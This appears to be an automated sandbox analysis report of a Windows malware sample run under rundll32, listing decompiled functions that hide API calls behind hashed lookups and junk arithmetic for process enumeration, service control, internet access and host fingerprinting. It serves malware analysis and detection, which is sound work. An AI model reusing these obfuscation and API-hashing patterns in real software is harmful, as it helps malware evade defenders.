Memory Dump Source

Source File: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true

Associated: 0000000E.00000002.2115499812.00000000006F0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2115530162.000000000070C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: f07317842d7f1cfa12af78b307ad7322b6e04794baad9ec54bf25dacedc686a1
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: DFF069B190020CFFDF08DF94DD4A99EBFB5EB41304F108188F905A6250D3B69B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 006F5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E006F5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E006F602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E007007A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x006f5fb5
0x006f5fb6
0x006f5fb7
0x006f5fbb
0x006f5fbc
0x006f5fc1
0x006f5fcb
0x006f5fd7
0x006f5fde
0x006f5fe5
0x006f5ffc
0x006f5fff
0x006f6006
0x006f600d
0x006f601a
0x006f6025
0x006f602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 006F6025

Memory Dump Source

Source File: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true

Associated: 0000000E.00000002.2115499812.00000000006F0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2115530162.000000000070C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 769c5e9c67a2d742db81df34c261f847074929c25c9e5cfca6dcae3568ff5524
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: B1F03CB0811208FFDB48DFA0E94689EBFB9EB40300F208198E509A7260E7755F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 3024 Parent PID: 2804 rundll32.exeCOMMON

Executed Functions

Function 002B75AE, Relevance: 1.6, APIs: 1, Instructions: 62
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E002B75AE(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;
				signed int _t55;
				void* _t63;
				void* _t64;

				_t64 = __edx;
				E002B602B(_t43);
				_v8 = 0x98b5;
				_v8 = _v8 >> 9;
				_t54 = 0x5f;
				_v8 = _v8 / _t54;
				_v8 = _v8 + 0xffff1c63;
				_v8 = _v8 ^ 0xffff635b;
				_v12 = 0x5016;
				_v12 = _v12 + 0xffff6b9b;
				_t55 = 0x41;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x03f03403;
				_t51 = E002C07A9(0x93576eb5, 0x12e6675d, _t55, _t55, 0x110);
				_t52 =  *_t51(_a36, _a12, _t64, _a20, _a32, 0, _a8, _a24, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t63, __ecx, __ecx); // executed
				return _t52;
			}

0x002b75b7
0x002b75d8
0x002b75dd
0x002b75e7
0x002b75f2
0x002b75f7
0x002b75fc
0x002b7603
0x002b760a
0x002b7611
0x002b761b
0x002b7623
0x002b762b
0x002b763f
0x002b765c
0x002b7662

APIs

CryptDecodeObjectEx.CRYPT32(00001A16,3FEE891D,00000000,FFFF309F,FEFFE01A,00000000,?,01C46047), ref: 002B765C

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CryptDecodeObject
String ID:
API String ID: 1207547050-0
Opcode ID: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
Instruction ID: 862f650bda0db649638ca1b92b68516f7c4399be0c12212ec531bca92f8a8d42
Opcode Fuzzy Hash: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
Instruction Fuzzy Hash: 7B21087290060CFFDF05CF94DC46DDE7F76EB08314F148148FA1866160D7B29A61AB90

Uniqueness

Uniqueness Score: -1.00%

Function 002B109C, Relevance: 1.5, APIs: 1, Instructions: 46
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E002B109C(void* __ecx, WCHAR* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				void* _t38;
				signed int _t40;
				WCHAR* _t46;

				_push(_a16);
				_t46 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002B602B(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0xf19a8;
				_v20 = 0x58c643;
				_v12 = 0xbcc6;
				_v12 = _v12 | 0xbb59ffff;
				_v12 = _v12 ^ 0xbb59839d;
				_v8 = 0x5dbd;
				_v8 = _v8 << 0xd;
				_t40 = 0x3f;
				_v8 = _v8 / _t40;
				_v8 = _v8 * 0x1f;
				_v8 = _v8 ^ 0x05c44d1b;
				E002C07A9(0xce5de7ff, 0x9164b7cc, _t40, _t40, 0x264);
				_t38 = FindFirstFileW(_t46, _a4); // executed
				return _t38;
			}

0x002b10a3
0x002b10a6
0x002b10a8
0x002b10ab
0x002b10ae
0x002b10b1
0x002b10b3
0x002b10b8
0x002b10bf
0x002b10c8
0x002b10cf
0x002b10d6
0x002b10dd
0x002b10e4
0x002b10eb
0x002b10f4
0x002b10fc
0x002b110f
0x002b1112
0x002b111f
0x002b112b
0x002b1131

APIs

FindFirstFileW.KERNEL32(?,BB59839D), ref: 002B112B

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
Instruction ID: b38b9a2291ebec3663dc5a68e361c7e8e59267cb4ad11a0d40ffdfef14d13d4e
Opcode Fuzzy Hash: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
Instruction Fuzzy Hash: 651157B5D01208FBDF08EFA8D94A9DEBFB5EF44314F208198E9086B251D7B54B249F91

Uniqueness

Uniqueness Score: -1.00%

Function 002C023A, Relevance: 1.5, APIs: 1, Instructions: 42
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E002C023A(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
				signed int _v8;
				signed int _v12;
				void* _t25;
				int _t31;
				void* _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t37 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002B602B(_t25);
				_v12 = 0x4c1d;
				_v12 = _v12 ^ 0x5ad90362;
				_v12 = _v12 ^ 0x5ad955af;
				_v8 = 0xc5f7;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x98520be0;
				_v8 = _v8 + 0xd998;
				_v8 = _v8 ^ 0x98094817;
				E002C07A9(0xb92c1268, 0x1f801b8, __ecx, __ecx, 0x1c9);
				_t31 = InternetReadFile(_t37, _a8, _a16, _a20); // executed
				return _t31;
			}

0x002c023d
0x002c023e
0x002c0240
0x002c0243
0x002c0245
0x002c0248
0x002c024b
0x002c024e
0x002c0252
0x002c0253
0x002c0258
0x002c0262
0x002c026e
0x002c0275
0x002c028c
0x002c028f
0x002c0296
0x002c029d
0x002c02aa
0x002c02bc
0x002c02c2

APIs

InternetReadFile.WININET(00000000,2CD2473D,0003F015,FFEAC835), ref: 002C02BC

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
Instruction ID: 59ded8fcc22e2344ab7bcfe05e6d91f5f4ce0b803760d5fee4bf6d37c14d597d
Opcode Fuzzy Hash: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
Instruction Fuzzy Hash: A0012576912208FFEF05EF94D9068DEBFB9EF04314F108188F90466261D372AF61AB90

Uniqueness

Uniqueness Score: -1.00%

Function 002B1C88, Relevance: 1.5, APIs: 1, Instructions: 38
processCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E002B1C88(int _a12) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t28;
				signed int _t29;

				_v28 = 0x4309a9;
				asm("stosd");
				_t29 = 0x31;
				asm("stosd");
				asm("stosd");
				_v12 = 0x7af7;
				_v12 = _v12 + 0x2003;
				_v12 = _v12 ^ 0x000083a5;
				_v8 = 0xa138;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t29;
				_v8 = _v8 ^ 0x00030e85;
				E002C07A9(0xf2bcf6a3, 0x9164b7cc, _t29, _t29, 0x45);
				_t28 = CreateToolhelp32Snapshot(_a12, 0); // executed
				return _t28;
			}

0x002b1c8f
0x002b1c9d
0x002b1ca0
0x002b1ca3
0x002b1ca6
0x002b1ca7
0x002b1cae
0x002b1cb5
0x002b1cbc
0x002b1cc3
0x002b1cd6
0x002b1cd9
0x002b1ce6
0x002b1cf3
0x002b1cf9

APIs

CreateToolhelp32Snapshot.KERNEL32(?,00000000), ref: 002B1CF3

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
Instruction ID: 49e72cb259b30395d21de6eaed717af2a0bfe49591f13f53fa1f38378fc9a65e
Opcode Fuzzy Hash: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
Instruction Fuzzy Hash: B6F06D71E00208BBFB04DFA8CD4668EFBB5EF84704F208099A50067291D7B55F148A81

Uniqueness

Uniqueness Score: -1.00%

Function 002B5A52, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E002B5A52(WCHAR* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				unsigned int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t25;
				void* _t31;
				WCHAR* _t37;

				_t37 = __ecx;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				_push(__ecx);
				E002B602B(_t25);
				_v28 = 0x354aea;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v8 = 0x4733;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xffffa4b2;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x00006f5b;
				_v12 = 0x6e5;
				_v12 = _v12 ^ 0x21b9cf62;
				_v12 = _v12 ^ 0x21b9d5f6;
				E002C07A9(0xfc7e7fb7, 0x1f801b8, __ecx, __ecx, 0x1ad);
				_t31 = InternetOpenW(_t37, _a24, 0, 0, 0); // executed
				return _t31;
			}

0x002b5a5d
0x002b5a5f
0x002b5a60
0x002b5a63
0x002b5a66
0x002b5a69
0x002b5a6c
0x002b5a6f
0x002b5a70
0x002b5a71
0x002b5a72
0x002b5a77
0x002b5a86
0x002b5a91
0x002b5a99
0x002b5a9a
0x002b5aa1
0x002b5aa5
0x002b5aac
0x002b5ab0
0x002b5ab7
0x002b5abe
0x002b5ac5
0x002b5ad2
0x002b5ae1
0x002b5ae9

APIs

InternetOpenW.WININET(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0CD25E5E), ref: 002B5AE1

Strings

J5, xrefs: 002B5A77

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: J5
API String ID: 2038078732-3088381744
Opcode ID: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
Instruction ID: b1ae3eff2e51d99fe27f224dbcdb5b1aff2dc500b1e4f47076ec23bc8a98dd91
Opcode Fuzzy Hash: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
Instruction Fuzzy Hash: A0113C7290060CBFEB05DF98DD859DFBB79EF14358F104098FA0562120D3B64E659BA1

Uniqueness

Uniqueness Score: -1.00%

Function 002B2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E002B2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E002B602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002C07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x002b295f
0x002b2964
0x002b2967
0x002b296a
0x002b296d
0x002b296e
0x002b296f
0x002b2977
0x002b2985
0x002b298a
0x002b2992
0x002b299a
0x002b29a2
0x002b29a9
0x002b29b0
0x002b29b7
0x002b29bb
0x002b29cf
0x002b29dc
0x002b29e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002B29DC

Strings

<^, xrefs: 002B2977

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
Instruction ID: 3dff06201c6b0f9573f9ca5af67c631eb589c5b848df26de04f1a81c39f8c0c1
Opcode Fuzzy Hash: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
Instruction Fuzzy Hash: B1015B72A00108BBEB18DF95DC4A8DFBFB6EF44350F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 002BC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002BC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E002B602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002C07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x002bc6e1
0x002bc6e6
0x002bc6f0
0x002bc6fc
0x002bc703
0x002bc706
0x002bc70d
0x002bc711
0x002bc715
0x002bc71c
0x002bc723
0x002bc72a
0x002bc731
0x002bc738
0x002bc751
0x002bc762
0x002bc768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 002BC762

Strings

/O, xrefs: 002BC6E6

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
Instruction ID: 090c1aaf7ee6b55ca3134410c8d7422bf54326a9791ac611592a067f71805495
Opcode Fuzzy Hash: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
Instruction Fuzzy Hash: 211133B290122DBBCB25DF95DC498EFBFB8EF04754F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 002BF74E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002BF74E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t28;
				intOrPtr* _t35;
				void* _t36;
				signed int _t38;
				void* _t44;
				void* _t45;

				_t45 = __edx;
				E002B602B(_t28);
				_v8 = 0x515c;
				_v8 = _v8 + 0xc7b4;
				_t38 = 0xc;
				_v8 = _v8 / _t38;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000000a5;
				_v12 = 0xe7ac;
				_v12 = _v12 * 3;
				_v12 = _v12 ^ 0xe245e609;
				_v12 = _v12 ^ 0xe24720e8;
				_t35 = E002C07A9(0xea0af15d, 0x7a94c48d, _t38, _t38, 0x20);
				_t36 =  *_t35(0, _t45, _a4, 0, __edx, _a4, _a8, _a12, _a16, _t44, __ecx, __ecx); // executed
				return _t36;
			}

0x002bf757
0x002bf765
0x002bf76a
0x002bf774
0x002bf782
0x002bf787
0x002bf78f
0x002bf793
0x002bf79a
0x002bf7ac
0x002bf7af
0x002bf7b6
0x002bf7c3
0x002bf7d1
0x002bf7d7

APIs

ObtainUserAgentString.URLMON(00000000,00000000,E24720E8), ref: 002BF7D1

Strings

G, xrefs: 002BF7B6

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: AgentObtainStringUser
String ID: G
API String ID: 2681117516-4236931613
Opcode ID: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
Instruction ID: efbd431b96c514920a15dc8c3f5b7333458c9a00ebe732a83af6c587b0502ddb
Opcode Fuzzy Hash: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
Instruction Fuzzy Hash: 7D015771900208FBEB04DF94DD4AADEBFB5EF84310F208188F50866290E6B55B20DB91

Uniqueness

Uniqueness Score: -1.00%

Function 002B76F7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E002B76F7(struct tagPROCESSENTRY32W* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t28;
				void* _t35;
				signed int _t37;
				struct tagPROCESSENTRY32W* _t43;

				_push(_a8);
				_t43 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002B602B(_t28);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x5756b4;
				_v20 = 0x17430f;
				_v12 = 0x6271;
				_t37 = 0x43;
				_v12 = _v12 / _t37;
				_v12 = _v12 ^ 0x00004051;
				_v8 = 0x9292;
				_v8 = _v8 + 0x9a70;
				_v8 = _v8 << 0xb;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0x3dcb9719;
				_t35 = E002C07A9(0x5538536e, 0x9164b7cc, _t37, _t37, 0x1b8);
				Process32FirstW(_a8, _t43); // executed
				return _t35;
			}

0x002b76fe
0x002b7701
0x002b7703
0x002b7706
0x002b7707
0x002b7708
0x002b770d
0x002b7714
0x002b771d
0x002b7724
0x002b7730
0x002b7738
0x002b7740
0x002b7747
0x002b774e
0x002b7755
0x002b7764
0x002b7767
0x002b7774
0x002b7780
0x002b7786

APIs

Process32FirstW.KERNEL32(00000000,?,?,?,?,?,?,?,00000BF7), ref: 002B7780

Strings

nS8U, xrefs: 002B775F

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FirstProcess32
String ID: nS8U
API String ID: 2623510744-2564412997
Opcode ID: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
Instruction ID: c8eb13e5943e41368905e6b535f666d643927e8c649bf6a41f8c80e96d1f93c9
Opcode Fuzzy Hash: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
Instruction Fuzzy Hash: 67018CB5D01208FBDB04DF94D90A9DEBFB5EF40314F208089E8186B251E7B55F249F81

Uniqueness

Uniqueness Score: -1.00%

Function 002B1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E002B1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002B602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002C07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x002b1006
0x002b1009
0x002b100c
0x002b1011
0x002b1016
0x002b101d
0x002b1026
0x002b102d
0x002b1034
0x002b103b
0x002b1047
0x002b104f
0x002b1057
0x002b105e
0x002b1065
0x002b106c
0x002b1073
0x002b1077
0x002b108b
0x002b1096
0x002b109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 002B1096

Strings

[, xrefs: 002B103B

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
Instruction ID: 6cab85bc1ebfa80013f2e84f967001b406cdc603186fa5d8b7595cb887e4d864
Opcode Fuzzy Hash: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
Instruction Fuzzy Hash: 33015BB6D01308FBDF04DF94C94AADEBBB1AB54318F108188E41466291D3B19B689F91

Uniqueness

Uniqueness Score: -1.00%

Function 002B602C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E002B602C(void* __ecx, CHAR* __edx, DWORD* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t23;
				int _t29;
				CHAR* _t34;

				_push(_a8);
				_t34 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002B602B(_t23);
				_v16 = _v16 & 0x00000000;
				_v28 = 0x56a9ae;
				_v24 = 0x46a5f8;
				_v20 = 0x71462f;
				_v8 = 0x2cb4;
				_v8 = _v8 + 0xdc6b;
				_v8 = _v8 * 0x25;
				_v8 = _v8 ^ 0x0026370c;
				_v12 = 0x2021;
				_v12 = _v12 ^ 0x8c534c3d;
				_v12 = _v12 ^ 0x8c530eb3;
				E002C07A9(0xbd983dde, 0x9164b7cc, __ecx, __ecx, 0x16f);
				_t29 = GetComputerNameA(_t34, _a4); // executed
				return _t29;
			}

0x002b6033
0x002b6036
0x002b6038
0x002b603b
0x002b603c
0x002b603d
0x002b6042
0x002b6049
0x002b6055
0x002b605c
0x002b6063
0x002b606a
0x002b6081
0x002b6084
0x002b608b
0x002b6092
0x002b6099
0x002b60a6
0x002b60b2
0x002b60b8

APIs

GetComputerNameA.KERNEL32(?,8C530EB3,?,?,?,?,?,?,0000007A), ref: 002B60B2

Strings

/Fq, xrefs: 002B605C

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
